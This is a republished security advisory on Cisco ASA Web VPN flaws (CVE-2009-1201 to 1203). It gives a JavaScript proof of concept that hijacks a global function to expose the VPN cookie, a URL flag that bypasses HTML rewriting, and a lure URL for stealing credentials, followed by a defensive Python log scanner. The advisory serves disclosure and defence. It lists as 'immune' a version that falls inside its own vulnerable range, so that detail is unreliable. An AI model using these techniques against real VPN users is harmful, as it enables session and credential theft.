Credit:
The information has been provided by Trustwave Advisories.
The original article can be found at: https://www.trustwave.com/spiderLabs-advisories.php
|
|
Vulnerable Systems:
* Cisco Adaptive Security Appliance version 8.2.1 and prior
Immune Systems:
* Cisco Adaptive Security Appliance version 8.1.2.25
Post-Authentication Cross-Site Scripting (CVE-2009-1201):
The Web VPN's client-side JavaScript calls helper functions through global names that any script loaded into the same document can overwrite. For example, the "csco_wrap_js" JavaScript function in /+CSCOL+/cte.js makes a call to a function referenced by "CSCO_WebVPN['process']".
The result of this call is then used in an "eval" statement.
function csco_wrap_js(str)
{
    var ret="<script id=CSCO_GHOST src="+CSCO_Gateway+
        "/+CSCOL+/cte.js></scr"+
        "ipt><script id=CSCO_GHOST src="+
        CSCO_Gateway+"/+CSCOE+/apcf></sc"+"ript>";
    var js_mangled=CSCO_WebVPN['process']('js',str);
    ret+=CSCO_WebVPN['process']('html',eval(js_mangled));
    return ret;
};
To exploit this behavior, a malicious page can rewrite "CSCO_WebVPN['process']" with an attacker-defined function that will return an arbitrary value. The next time the "csco_wrap_js" function is called, the malicious code will be executed. Below is a proof of concept.
<html><script>
function a(b, c)
{
    return "alert('Your VPN location:\\n\\n'+" +
        "document.location+'\\n\\n\\n\\n\\n" +
        "Your VPN cookie:\\n\\n'+document.cookie);";
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');
</script></html>
HTML Rewriting Bypass (CVE-2009-1202):
When a webpage is requested through the ASA's Web VPN, the target scheme and hostname are Rot13-encoded, then hex-encoded, and placed in the ASA's URL path. For example, "http://www.trustwave.com" is accessed by requesting the following ASA path:
/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/
The HTML returned for this request is visibly rewritten by the ASA, starting at the very first line:
<script id='CSCO_GHOST' src="/+webvpn+/toolbar.js">
However, if the request URL is modified to change the leading hex value "00" to "01", the HTML document is returned without any rewriting. The page's scriptable content then runs in the ASA's DOM, making Cross-Site Scripting trivial.
Authentication Credential Theft (CVE-2009-1203):
When a user accesses an FTP or CIFS destination through the Web VPN, the resulting URL is formatted similarly to the web requests described above. The following URL attempts to connect to ftp.example.com; normally it would be loaded in an HTML frame within the Web VPN website.
/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a
The ASA first attempts to connect to the FTP server or CIFS share using anonymous credentials. If those fail, the user is prompted for login credentials. When viewed on its own (outside of a frame), the submission form gives no indication of what it is for and looks very similar to the Web VPN's primary login page. If an attacker sent this URL to a user, it is very possible that the user would assume they need to resubmit their credentials to the Web VPN.
The ASA would then forward the credentials to the attacker's FTP or CIFS server.
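As an added example (not Trustwave's or Cisco's code), the following Python decodes the Rot13-then-hex encoding used by both the web request path in the HTML Rewriting Bypass section and the FTP/CIFS browse URL in the Authentication Credential Theft section, and flags the two request shapes a defender would want to find in ASA or proxy logs: a leading flag byte other than "00" (the rewriting bypass) and a file browse that points at a host outside an allow-list (the credential-theft lure). The position of the flag byte and the "++/" terminator follow the path as printed in the advisory; the allow-list host files.corp.example and the sample request list are constructed for the example. Note that decoding the advisory's own hex string yields the https scheme rather than http.

```python
# Added example (not Trustwave's or Cisco's code): decode the ASA Web VPN
# path encoding described in the advisory and flag the two suspicious
# request shapes it describes, so a defender can triage ASA or proxy logs.
import codecs
import re
from urllib.parse import parse_qs, urlsplit

# Web request form: /+CSCO+<2-hex-digit flag><hex(rot13(scheme://host))>++/
# The advisory shows flag "00" for normally rewritten requests and "01" for
# the rewriting bypass. The "++/" terminator follows the path as printed
# in the advisory.
CSCO_PATH = re.compile(r"/\+CSCO\+([0-9A-Fa-f]{2})([0-9A-Fa-f]+)\+{1,2}/")
# FTP/CIFS browse form:
#   /+CSCOE+/files/browse.html?code=init&path=<scheme>://<hex(rot13(host))>
FILES_BROWSE = "/+CSCOE+/files/browse.html"


def decode_target(hex_blob):
    """Reverse the ASA encoding: hex digits -> ASCII text -> rot13."""
    return codecs.decode(bytes.fromhex(hex_blob).decode("ascii"), "rot13")


def encode_target(url, flag="00"):
    """Forward encoding of scheme://host, producing the normal ASA path."""
    blob = codecs.encode(url, "rot13").encode("ascii").hex().upper()
    return "/+CSCO+" + flag + blob + "++/"


def analyse_request(path, trusted_file_hosts):
    """Return (decoded target, findings) for one requested ASA path.

    trusted_file_hosts: lowercase hostnames the organisation really serves
    files from; any other FTP/CIFS target is the credential-theft shape.
    """
    findings = []
    m = CSCO_PATH.search(path)
    if m:
        flag, blob = m.groups()
        target = decode_target(blob)
        if flag != "00":
            findings.append("rewrite bypass flag %s for %s (CVE-2009-1202)" % (flag, target))
        return target, findings

    parts = urlsplit(path)
    if parts.path == FILES_BROWSE:
        raw = parse_qs(parts.query).get("path", [""])[0]  # parse_qs undoes the %-escapes
        scheme, sep, blob = raw.partition("://")
        host = decode_target(blob) if sep else ""
        if host and host.lower() not in trusted_file_hosts:
            findings.append("%s browse to untrusted host %s (CVE-2009-1203)" % (scheme, host))
        return scheme + "://" + host, findings

    return "", findings


def scan_log(lines, trusted_file_hosts):
    """Run analyse_request over request paths (one per log line) and collect findings."""
    hits = []
    for line in lines:
        _, findings = analyse_request(line.strip(), trusted_file_hosts)
        hits.extend(findings)
    return hits


# Constructed sample of requested paths. The first and third are the
# advisory's own examples; the second is the first with the "01" flag.
SAMPLE_PATHS = [
    "/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/",
    "/+CSCO+0175676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/",
    "/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a",
    "/+CSCOE+/logon.html",
]

if __name__ == "__main__":
    # Hypothetical allow-list: the only host users are expected to browse files on.
    for hit in scan_log(SAMPLE_PATHS, {"files.corp.example"}):
        print(hit)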
Patch Availability:
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT
CVE Information:
CVE-2009-1201
CVE-2009-1202
CVE-2009-1203
Disclosure Timeline:
03/31/09 - Cisco notified of vulnerabilities
06/24/09 - Cisco software updates released; Advisory released
|
|
|
|